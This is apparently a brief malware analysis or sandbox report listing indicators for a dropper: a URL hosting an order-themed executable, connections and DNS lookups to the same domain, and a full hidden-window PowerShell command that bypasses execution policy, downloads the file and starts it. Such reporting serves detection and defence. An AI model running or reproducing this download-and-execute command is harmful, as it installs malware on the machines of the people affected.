Technical Information
- https://www.gyokeritato.hu/agrooter/rfq/order.exe as p.order2.exe
- 'gy###ritato.hu':443
- 'gy###ritato.hu':443
- DNS ASK gy###ritato.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://www.gyokeritato.hu/agrooter/RFQ/Order.exe','P.Order2.exe');Start-Process ...' (with hidden window)